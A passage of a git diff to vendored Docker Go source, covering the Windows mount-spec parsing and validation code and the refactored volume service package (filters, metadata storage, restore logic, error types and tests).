for the mode of the mount + // Mode (optional): + // - Hopefully self explanatory in comparison to above regex's. 
+ // - Colon is not in the capture group + rxMode = `(:(?P(?i)ro|rw))?` +) + +type mountValidator func(mnt *mount.Mount) error + +func windowsSplitRawSpec(raw, destRegex string) ([]string, error) { + specExp := regexp.MustCompile(`^` + rxSource + destRegex + rxMode + `$`) + match := specExp.FindStringSubmatch(strings.ToLower(raw)) + + // Must have something back + if len(match) == 0 { + return nil, errInvalidSpec(raw) + } + + var split []string + matchgroups := make(map[string]string) + // Pull out the sub expressions from the named capture groups + for i, name := range specExp.SubexpNames() { + matchgroups[name] = strings.ToLower(match[i]) + } + if source, exists := matchgroups["source"]; exists { + if source != "" { + split = append(split, source) + } + } + if destination, exists := matchgroups["destination"]; exists { + if destination != "" { + split = append(split, destination) + } + } + if mode, exists := matchgroups["mode"]; exists { + if mode != "" { + split = append(split, mode) + } + } + // Fix #26329. If the destination appears to be a file, and the source is null, + // it may be because we've fallen through the possible naming regex and hit a + // situation where the user intention was to map a file into a container through + // a local volume, but this is not supported by the platform. + if matchgroups["source"] == "" && matchgroups["destination"] != "" { + volExp := regexp.MustCompile(`^` + rxName + `$`) + reservedNameExp := regexp.MustCompile(`^` + rxReservedNames + `$`) + + if volExp.MatchString(matchgroups["destination"]) { + if reservedNameExp.MatchString(matchgroups["destination"]) { + return nil, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", matchgroups["destination"]) + } + } else { + + exists, isDir, _ := currentFileInfoProvider.fileInfo(matchgroups["destination"]) + if exists && !isDir { + return nil, fmt.Errorf("file '%s' cannot be mapped. 
Only directories can be mapped on this platform", matchgroups["destination"]) + + } + } + } + return split, nil +} + +func windowsValidMountMode(mode string) bool { + if mode == "" { + return true + } + return rwModes[strings.ToLower(mode)] +} +func windowsValidateNotRoot(p string) error { + p = strings.ToLower(strings.Replace(p, `/`, `\`, -1)) + if p == "c:" || p == `c:\` { + return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) + } + return nil +} + +var windowsSpecificValidators mountValidator = func(mnt *mount.Mount) error { + return windowsValidateNotRoot(mnt.Target) +} + +func windowsValidateRegex(p, r string) error { + if regexp.MustCompile(`^` + r + `$`).MatchString(strings.ToLower(p)) { + return nil + } + return fmt.Errorf("invalid mount path: '%s'", p) +} +func windowsValidateAbsolute(p string) error { + if err := windowsValidateRegex(p, rxDestination); err != nil { + return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) + } + return nil +} + +func windowsDetectMountType(p string) mount.Type { + if strings.HasPrefix(p, `\\.\pipe\`) { + return mount.TypeNamedPipe + } else if regexp.MustCompile(`^` + rxHostDir + `$`).MatchString(p) { + return mount.TypeBind + } else { + return mount.TypeVolume + } +} + +func (p *windowsParser) ReadWrite(mode string) bool { + return strings.ToLower(mode) != "ro" +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. 
+func (p *windowsParser) ValidateVolumeName(name string) error { + nameExp := regexp.MustCompile(`^` + rxName + `$`) + if !nameExp.MatchString(name) { + return errors.New("invalid volume name") + } + nameExp = regexp.MustCompile(`^` + rxReservedNames + `$`) + if nameExp.MatchString(name) { + return fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) + } + return nil +} +func (p *windowsParser) ValidateMountConfig(mnt *mount.Mount) error { + return p.validateMountConfigReg(mnt, rxDestination, windowsSpecificValidators) +} + +type fileInfoProvider interface { + fileInfo(path string) (exist, isDir bool, err error) +} + +type defaultFileInfoProvider struct { +} + +func (defaultFileInfoProvider) fileInfo(path string) (exist, isDir bool, err error) { + fi, err := os.Stat(path) + if err != nil { + if !os.IsNotExist(err) { + return false, false, err + } + return false, false, nil + } + return true, fi.IsDir(), nil +} + +var currentFileInfoProvider fileInfoProvider = defaultFileInfoProvider{} + +func (p *windowsParser) validateMountConfigReg(mnt *mount.Mount, destRegex string, additionalValidators ...mountValidator) error { + + for _, v := range additionalValidators { + if err := v(mnt); err != nil { + return &errMountConfig{mnt, err} + } + } + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := windowsValidateRegex(mnt.Target, destRegex); err != nil { + return &errMountConfig{mnt, err} + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := 
windowsValidateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + exists, isdir, err := currentFileInfoProvider.fileInfo(mnt.Source) + if err != nil { + return &errMountConfig{mnt, err} + } + if !exists { + return &errMountConfig{mnt, errBindSourceDoesNotExist(mnt.Source)} + } + if !isdir { + return &errMountConfig{mnt, fmt.Errorf("source path must be a directory")} + } + + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + + if len(mnt.Source) != 0 { + if err := p.ValidateVolumeName(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + } + case mount.TypeNamedPipe: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if mnt.ReadOnly { + return &errMountConfig{mnt, errExtraField("ReadOnly")} + } + + if windowsDetectMountType(mnt.Source) != mount.TypeNamedPipe { + return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Source)} + } + + if windowsDetectMountType(mnt.Target) != mount.TypeNamedPipe { + return &errMountConfig{mnt, fmt.Errorf("'%s' is not a valid pipe path", mnt.Target)} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} +func (p *windowsParser) ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { + return p.parseMountRaw(raw, volumeDriver, rxDestination, true, windowsSpecificValidators) +} + +func (p *windowsParser) parseMountRaw(raw, volumeDriver, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) { + arr, err := windowsSplitRawSpec(raw, destRegex) + if err != nil { + return nil, err + } + + var spec mount.Mount + var mode string 
+ switch len(arr) { + case 1: + // Just a destination path in the container + spec.Target = arr[0] + case 2: + if windowsValidMountMode(arr[1]) { + // Destination + Mode is not a valid volume - volumes + // cannot include a mode. e.g. /foo:rw + return nil, errInvalidSpec(raw) + } + // Host Source Path or Name + Destination + spec.Source = strings.Replace(arr[0], `/`, `\`, -1) + spec.Target = arr[1] + case 3: + // HostSourcePath+DestinationPath+Mode + spec.Source = strings.Replace(arr[0], `/`, `\`, -1) + spec.Target = arr[1] + mode = arr[2] + default: + return nil, errInvalidSpec(raw) + } + if convertTargetToBackslash { + spec.Target = strings.Replace(spec.Target, `/`, `\`, -1) + } + + if !windowsValidMountMode(mode) { + return nil, errInvalidMode(mode) + } + + spec.Type = windowsDetectMountType(spec.Source) + spec.ReadOnly = !p.ReadWrite(mode) + + // cannot assume that if a volume driver is passed in that we should set it + if volumeDriver != "" && spec.Type == mount.TypeVolume { + spec.VolumeOptions = &mount.VolumeOptions{ + DriverConfig: &mount.Driver{Name: volumeDriver}, + } + } + + if copyData, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + if spec.VolumeOptions == nil { + spec.VolumeOptions = &mount.VolumeOptions{} + } + spec.VolumeOptions.NoCopy = !copyData + } + + mp, err := p.parseMountSpec(spec, destRegex, convertTargetToBackslash, additionalValidators...) 
+ if mp != nil { + mp.Mode = mode + } + if err != nil { + err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) + } + return mp, err +} + +func (p *windowsParser) ParseMountSpec(cfg mount.Mount) (*MountPoint, error) { + return p.parseMountSpec(cfg, rxDestination, true, windowsSpecificValidators) +} +func (p *windowsParser) parseMountSpec(cfg mount.Mount, destRegex string, convertTargetToBackslash bool, additionalValidators ...mountValidator) (*MountPoint, error) { + if err := p.validateMountConfigReg(&cfg, destRegex, additionalValidators...); err != nil { + return nil, err + } + mp := &MountPoint{ + RW: !cfg.ReadOnly, + Destination: cfg.Target, + Type: cfg.Type, + Spec: cfg, + } + if convertTargetToBackslash { + mp.Destination = strings.Replace(cfg.Target, `/`, `\`, -1) + } + + switch cfg.Type { + case mount.TypeVolume: + if cfg.Source == "" { + mp.Name = stringid.GenerateNonCryptoID() + } else { + mp.Name = cfg.Source + } + mp.CopyData = p.DefaultCopyMode() + + if cfg.VolumeOptions != nil { + if cfg.VolumeOptions.DriverConfig != nil { + mp.Driver = cfg.VolumeOptions.DriverConfig.Name + } + if cfg.VolumeOptions.NoCopy { + mp.CopyData = false + } + } + case mount.TypeBind: + mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1) + case mount.TypeNamedPipe: + mp.Source = strings.Replace(cfg.Source, `/`, `\`, -1) + } + // cleanup trailing `\` except for paths like `c:\` + if len(mp.Source) > 3 && mp.Source[len(mp.Source)-1] == '\\' { + mp.Source = mp.Source[:len(mp.Source)-1] + } + if len(mp.Destination) > 3 && mp.Destination[len(mp.Destination)-1] == '\\' { + mp.Destination = mp.Destination[:len(mp.Destination)-1] + } + return mp, nil +} + +func (p *windowsParser) ParseVolumesFrom(spec string) (string, string, error) { + if len(spec) == 0 { + return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") + } + + specParts := strings.SplitN(spec, ":", 2) + id := specParts[0] + mode := "rw" + + if len(specParts) == 2 { + mode = specParts[1] + if 
!windowsValidMountMode(mode) { + return "", "", errInvalidMode(mode) + } + + // Do not allow copy modes on volumes-from + if _, isSet := getCopyMode(mode, p.DefaultCopyMode()); isSet { + return "", "", errInvalidMode(mode) + } + } + return id, mode, nil +} + +func (p *windowsParser) DefaultPropagationMode() mount.Propagation { + return mount.Propagation("") +} + +func (p *windowsParser) ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) { + return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) +} +func (p *windowsParser) DefaultCopyMode() bool { + return false +} +func (p *windowsParser) IsBackwardCompatible(m *MountPoint) bool { + return false +} + +func (p *windowsParser) ValidateTmpfsMountDestination(dest string) error { + return errors.New("Platform does not support tmpfs") +} diff --git a/vendor/github.com/docker/docker/volume/service/by.go b/vendor/github.com/docker/docker/volume/service/by.go new file mode 100644 index 0000000000..c5a4638d2a --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/by.go @@ -0,0 +1,89 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/volume" +) + +// By is an interface which is used to implement filtering on volumes. +type By interface { + isBy() +} + +// ByDriver is `By` that filters based on the driver names that are passed in +func ByDriver(drivers ...string) By { + return byDriver(drivers) +} + +type byDriver []string + +func (byDriver) isBy() {} + +// ByReferenced is a `By` that filters based on if the volume has references +type ByReferenced bool + +func (ByReferenced) isBy() {} + +// And creates a `By` combining all the passed in bys using AND logic. 
+func And(bys ...By) By { + and := make(andCombinator, 0, len(bys)) + for _, by := range bys { + and = append(and, by) + } + return and +} + +type andCombinator []By + +func (andCombinator) isBy() {} + +// Or creates a `By` combining all the passed in bys using OR logic. +func Or(bys ...By) By { + or := make(orCombinator, 0, len(bys)) + for _, by := range bys { + or = append(or, by) + } + return or +} + +type orCombinator []By + +func (orCombinator) isBy() {} + +// CustomFilter is a `By` that is used by callers to provide custom filtering +// logic. +type CustomFilter filterFunc + +func (CustomFilter) isBy() {} + +// FromList returns a By which sets the initial list of volumes to use +func FromList(ls *[]volume.Volume, by By) By { + return &fromList{by: by, ls: ls} +} + +type fromList struct { + by By + ls *[]volume.Volume +} + +func (fromList) isBy() {} + +func byLabelFilter(filter filters.Args) By { + return CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + if !ok { + return false + } + + labels := dv.Labels() + if !filter.MatchKVList("label", labels) { + return false + } + if filter.Contains("label!") { + if filter.MatchKVList("label!", labels) { + return false + } + } + return true + }) +} diff --git a/vendor/github.com/docker/docker/volume/service/convert.go b/vendor/github.com/docker/docker/volume/service/convert.go new file mode 100644 index 0000000000..2967dc6722 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/convert.go @@ -0,0 +1,132 @@ +package service + +import ( + "context" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/volume" + "github.com/sirupsen/logrus" +) + +// convertOpts are used to pass options to `volumeToAPI` +type convertOpt interface { + isConvertOpt() +} + +type useCachedPath bool + +func (useCachedPath) isConvertOpt() {} + +type calcSize bool + +func (calcSize) 
isConvertOpt() {} + +type pathCacher interface { + CachedPath() string +} + +func (s *VolumesService) volumesToAPI(ctx context.Context, volumes []volume.Volume, opts ...convertOpt) []*types.Volume { + var ( + out = make([]*types.Volume, 0, len(volumes)) + getSize bool + cachedPath bool + ) + + for _, o := range opts { + switch t := o.(type) { + case calcSize: + getSize = bool(t) + case useCachedPath: + cachedPath = bool(t) + } + } + for _, v := range volumes { + select { + case <-ctx.Done(): + return nil + default: + } + apiV := volumeToAPIType(v) + + if cachedPath { + if vv, ok := v.(pathCacher); ok { + apiV.Mountpoint = vv.CachedPath() + } + } else { + apiV.Mountpoint = v.Path() + } + + if getSize { + p := v.Path() + if apiV.Mountpoint == "" { + apiV.Mountpoint = p + } + sz, err := directory.Size(ctx, p) + if err != nil { + logrus.WithError(err).WithField("volume", v.Name()).Warnf("Failed to determine size of volume") + sz = -1 + } + apiV.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(s.vs.CountReferences(v))} + } + + out = append(out, &apiV) + } + return out +} + +func volumeToAPIType(v volume.Volume) types.Volume { + createdAt, _ := v.CreatedAt() + tv := types.Volume{ + Name: v.Name(), + Driver: v.DriverName(), + CreatedAt: createdAt.Format(time.RFC3339), + } + if v, ok := v.(volume.DetailedVolume); ok { + tv.Labels = v.Labels() + tv.Options = v.Options() + tv.Scope = v.Scope() + } + if cp, ok := v.(pathCacher); ok { + tv.Mountpoint = cp.CachedPath() + } + return tv +} + +func filtersToBy(filter filters.Args, acceptedFilters map[string]bool) (By, error) { + if err := filter.Validate(acceptedFilters); err != nil { + return nil, err + } + var bys []By + if drivers := filter.Get("driver"); len(drivers) > 0 { + bys = append(bys, ByDriver(drivers...)) + } + if filter.Contains("name") { + bys = append(bys, CustomFilter(func(v volume.Volume) bool { + return filter.Match("name", v.Name()) + })) + } + bys = append(bys, byLabelFilter(filter)) + + if 
filter.Contains("dangling") { + var dangling bool + if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { + dangling = true + } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { + return nil, invalidFilter{"dangling", filter.Get("dangling")} + } + bys = append(bys, ByReferenced(!dangling)) + } + + var by By + switch len(bys) { + case 0: + case 1: + by = bys[0] + default: + by = And(bys...) + } + return by, nil +} diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/service/db.go similarity index 84% rename from vendor/github.com/docker/docker/volume/store/db.go rename to vendor/github.com/docker/docker/volume/service/db.go index c5fd1643f5..3b31f7bf14 100644 --- a/vendor/github.com/docker/docker/volume/store/db.go +++ b/vendor/github.com/docker/docker/volume/service/db.go @@ -1,11 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( "encoding/json" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" + "github.com/docker/docker/errdefs" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var volumeBucketName = []byte("volumes") @@ -28,7 +29,10 @@ func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error { if err != nil { return err } - b := tx.Bucket(volumeBucketName) + b, err := tx.CreateBucketIfNotExists(volumeBucketName) + if err != nil { + return errors.Wrap(err, "error creating volume bucket") + } return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata") } @@ -42,8 +46,11 @@ func (s *VolumeStore) getMeta(name string) (volumeMetadata, error) { func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error { b := tx.Bucket(volumeBucketName) + if b == nil { + return errdefs.NotFound(errors.New("volume bucket does not exist")) + } val := b.Get([]byte(name)) - if string(val) == "" { + if len(val) == 0 { return nil } if err := json.Unmarshal(val, meta); err 
!= nil { diff --git a/vendor/github.com/docker/docker/volume/service/db_test.go b/vendor/github.com/docker/docker/volume/service/db_test.go new file mode 100644 index 0000000000..4cac9176b7 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/db_test.go @@ -0,0 +1,52 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" + + "github.com/boltdb/bolt" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestSetGetMeta(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-set-get") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + db, err := bolt.Open(filepath.Join(dir, "db"), 0600, &bolt.Options{Timeout: 1 * time.Second}) + assert.NilError(t, err) + + store := &VolumeStore{db: db} + + _, err = store.getMeta("test") + assert.Assert(t, is.ErrorContains(err, "")) + + err = db.Update(func(tx *bolt.Tx) error { + _, err := tx.CreateBucket(volumeBucketName) + return err + }) + assert.NilError(t, err) + + meta, err := store.getMeta("test") + assert.NilError(t, err) + assert.DeepEqual(t, volumeMetadata{}, meta) + + testMeta := volumeMetadata{ + Name: "test", + Driver: "fake", + Labels: map[string]string{"a": "1", "b": "2"}, + Options: map[string]string{"foo": "bar"}, + } + err = store.setMeta("test", testMeta) + assert.NilError(t, err) + + meta, err = store.getMeta("test") + assert.NilError(t, err) + assert.DeepEqual(t, testMeta, meta) +} diff --git a/vendor/github.com/docker/docker/volume/service/default_driver.go b/vendor/github.com/docker/docker/volume/service/default_driver.go new file mode 100644 index 0000000000..1c1d5c54bc --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/default_driver.go @@ -0,0 +1,21 @@ +// +build linux windows + +package service // import "github.com/docker/docker/volume/service" +import ( + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume" + 
"github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/pkg/errors" +) + +func setupDefaultDriver(store *drivers.Store, root string, rootIDs idtools.IDPair) error { + d, err := local.New(root, rootIDs) + if err != nil { + return errors.Wrap(err, "error setting up default driver") + } + if !store.Register(d, volume.DefaultDriverName) { + return errors.New("local volume driver could not be registered") + } + return nil +} diff --git a/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go new file mode 100644 index 0000000000..fdb275eb9d --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/default_driver_stubs.go @@ -0,0 +1,10 @@ +// +build !linux,!windows + +package service // import "github.com/docker/docker/volume/service" + +import ( + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume/drivers" +) + +func setupDefaultDriver(_ *drivers.Store, _ string, _ idtools.IDPair) error { return nil } diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/service/errors.go similarity index 65% rename from vendor/github.com/docker/docker/volume/store/errors.go rename to vendor/github.com/docker/docker/volume/service/errors.go index 980175f29c..ce2d678dab 100644 --- a/vendor/github.com/docker/docker/volume/store/errors.go +++ b/vendor/github.com/docker/docker/volume/service/errors.go @@ -1,22 +1,34 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( + "fmt" "strings" - - "github.com/pkg/errors" ) -var ( +const ( // errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container - errVolumeInUse = errors.New("volume is in use") + errVolumeInUse conflictError = "volume is in use" // errNoSuchVolume is a typed error returned if the requested volume doesn't exist in the 
volume store - errNoSuchVolume = errors.New("no such volume") - // errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform - errInvalidName = errors.New("volume name is not valid on this platform") + errNoSuchVolume notFoundError = "no such volume" // errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver - errNameConflict = errors.New("volume name must be unique") + errNameConflict conflictError = "volume name must be unique" ) +type conflictError string + +func (e conflictError) Error() string { + return string(e) +} +func (conflictError) Conflict() {} + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + // OpErr is the error type returned by functions in the store package. It describes // the operation, volume name, and error. type OpErr struct { @@ -47,6 +59,11 @@ func (e *OpErr) Error() string { return s } +// Cause returns the error the caused this error +func (e *OpErr) Cause() error { + return e.Err +} + // IsInUse returns a boolean indicating whether the error indicates that a // volume is in use func IsInUse(err error) bool { @@ -64,13 +81,31 @@ func IsNameConflict(err error) bool { return isErr(err, errNameConflict) } +type causal interface { + Cause() error +} + func isErr(err error, expected error) bool { - err = errors.Cause(err) switch pe := err.(type) { case nil: return false - case *OpErr: - err = errors.Cause(pe.Err) + case causal: + return isErr(pe.Cause(), expected) } return err == expected } + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} diff --git a/vendor/github.com/docker/docker/volume/service/opts/opts.go 
b/vendor/github.com/docker/docker/volume/service/opts/opts.go new file mode 100644 index 0000000000..6c7e5f4ea6 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/opts/opts.go @@ -0,0 +1,89 @@ +package opts + +// CreateOption is used to pass options in when creating a volume +type CreateOption func(*CreateConfig) + +// CreateConfig is the set of config options that can be set when creating +// a volume +type CreateConfig struct { + Options map[string]string + Labels map[string]string + Reference string +} + +// WithCreateLabels creates a CreateOption which sets the labels to the +// passed in value +func WithCreateLabels(labels map[string]string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Labels = labels + } +} + +// WithCreateOptions creates a CreateOption which sets the options passed +// to the volume driver when creating a volume to the options passed in. +func WithCreateOptions(opts map[string]string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Options = opts + } +} + +// WithCreateReference creats a CreateOption which sets a reference to use +// when creating a volume. This ensures that the volume is created with a reference +// already attached to it to prevent race conditions with Create and volume cleanup. +func WithCreateReference(ref string) CreateOption { + return func(cfg *CreateConfig) { + cfg.Reference = ref + } +} + +// GetConfig is used with `GetOption` to set options for the volumes service's +// `Get` implementation. +type GetConfig struct { + Driver string + Reference string + ResolveStatus bool +} + +// GetOption is passed to the service `Get` add extra details on the get request +type GetOption func(*GetConfig) + +// WithGetDriver provides the driver to get the volume from +// If no driver is provided to `Get`, first the available metadata is checked +// to see which driver it belongs to, if that is not available all drivers are +// probed to find the volume. 
+func WithGetDriver(name string) GetOption { + return func(o *GetConfig) { + o.Driver = name + } +} + +// WithGetReference indicates to `Get` to increment the reference count for the +// retreived volume with the provided reference ID. +func WithGetReference(ref string) GetOption { + return func(o *GetConfig) { + o.Reference = ref + } +} + +// WithGetResolveStatus indicates to `Get` to also fetch the volume status. +// This can cause significant overhead in the volume lookup. +func WithGetResolveStatus(cfg *GetConfig) { + cfg.ResolveStatus = true +} + +// RemoveConfig is used by `RemoveOption` to store config options for remove +type RemoveConfig struct { + PurgeOnError bool +} + +// RemoveOption is used to pass options to the volumes service `Remove` implementation +type RemoveOption func(*RemoveConfig) + +// WithPurgeOnError is an option passed to `Remove` which will purge all cached +// data about a volume even if there was an error while attempting to remove the +// volume. +func WithPurgeOnError(b bool) RemoveOption { + return func(o *RemoveConfig) { + o.PurgeOnError = b + } +} diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/service/restore.go similarity index 85% rename from vendor/github.com/docker/docker/volume/store/restore.go rename to vendor/github.com/docker/docker/volume/service/restore.go index c0c5b519bc..55c66c4f42 100644 --- a/vendor/github.com/docker/docker/volume/store/restore.go +++ b/vendor/github.com/docker/docker/volume/service/restore.go @@ -1,12 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import ( + "context" "sync" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" + "github.com/sirupsen/logrus" ) // restore is called when a new volume store is created. 
@@ -21,6 +21,7 @@ func (s *VolumeStore) restore() { ls = listMeta(tx) return nil }) + ctx := context.Background() chRemove := make(chan *volumeMetadata, len(ls)) var wg sync.WaitGroup @@ -33,7 +34,7 @@ func (s *VolumeStore) restore() { var v volume.Volume var err error if meta.Driver != "" { - v, err = lookupVolume(meta.Driver, meta.Name) + v, err = lookupVolume(ctx, s.drivers, meta.Driver, meta.Name) if err != nil && err != errNoSuchVolume { logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume") return @@ -44,7 +45,7 @@ func (s *VolumeStore) restore() { return } } else { - v, err = s.getVolume(meta.Name) + v, err = s.getVolume(ctx, meta.Name, meta.Driver) if err != nil { if err == errNoSuchVolume { chRemove <- &meta @@ -59,13 +60,14 @@ func (s *VolumeStore) restore() { } // increment driver refcount - volumedrivers.CreateDriver(meta.Driver) + s.drivers.CreateDriver(meta.Driver) // cache the volume s.globalLock.Lock() s.options[v.Name()] = meta.Options s.labels[v.Name()] = meta.Labels s.names[v.Name()] = v + s.refs[v.Name()] = make(map[string]struct{}) s.globalLock.Unlock() }(meta) } diff --git a/vendor/github.com/docker/docker/volume/service/restore_test.go b/vendor/github.com/docker/docker/volume/service/restore_test.go new file mode 100644 index 0000000000..95420d9586 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/restore_test.go @@ -0,0 +1,58 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + volumetestutils "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" +) + +func TestRestore(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-restore") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + drivers := 
volumedrivers.NewStore(nil) + driverName := "test-restore" + drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + s, err := NewStore(dir, drivers) + assert.NilError(t, err) + defer s.Shutdown() + + ctx := context.Background() + _, err = s.Create(ctx, "test1", driverName) + assert.NilError(t, err) + + testLabels := map[string]string{"a": "1"} + testOpts := map[string]string{"foo": "bar"} + _, err = s.Create(ctx, "test2", driverName, opts.WithCreateOptions(testOpts), opts.WithCreateLabels(testLabels)) + assert.NilError(t, err) + + s.Shutdown() + + s, err = NewStore(dir, drivers) + assert.NilError(t, err) + + v, err := s.Get(ctx, "test1") + assert.NilError(t, err) + + dv := v.(volume.DetailedVolume) + var nilMap map[string]string + assert.DeepEqual(t, nilMap, dv.Options()) + assert.DeepEqual(t, nilMap, dv.Labels()) + + v, err = s.Get(ctx, "test2") + assert.NilError(t, err) + dv = v.(volume.DetailedVolume) + assert.DeepEqual(t, testOpts, dv.Options()) + assert.DeepEqual(t, testLabels, dv.Labels()) +} diff --git a/vendor/github.com/docker/docker/volume/service/service.go b/vendor/github.com/docker/docker/volume/service/service.go new file mode 100644 index 0000000000..a62a32de50 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service.go @@ -0,0 +1,243 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "sync/atomic" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type ds interface { + GetDriverList() []string +} + +type volumeEventLogger interface { + 
LogVolumeEvent(volumeID, action string, attributes map[string]string) +} + +// VolumesService manages access to volumes +type VolumesService struct { + vs *VolumeStore + ds ds + pruneRunning int32 + eventLogger volumeEventLogger +} + +// NewVolumeService creates a new volume service +func NewVolumeService(root string, pg plugingetter.PluginGetter, rootIDs idtools.IDPair, logger volumeEventLogger) (*VolumesService, error) { + ds := drivers.NewStore(pg) + if err := setupDefaultDriver(ds, root, rootIDs); err != nil { + return nil, err + } + + vs, err := NewStore(root, ds) + if err != nil { + return nil, err + } + return &VolumesService{vs: vs, ds: ds, eventLogger: logger}, nil +} + +// GetDriverList gets the list of registered volume drivers +func (s *VolumesService) GetDriverList() []string { + return s.ds.GetDriverList() +} + +// Create creates a volume +func (s *VolumesService) Create(ctx context.Context, name, driverName string, opts ...opts.CreateOption) (*types.Volume, error) { + if name == "" { + name = stringid.GenerateNonCryptoID() + } + v, err := s.vs.Create(ctx, name, driverName, opts...) + if err != nil { + return nil, err + } + + s.eventLogger.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) + apiV := volumeToAPIType(v) + return &apiV, nil +} + +// Get gets a volume +func (s *VolumesService) Get(ctx context.Context, name string, getOpts ...opts.GetOption) (*types.Volume, error) { + v, err := s.vs.Get(ctx, name, getOpts...) 
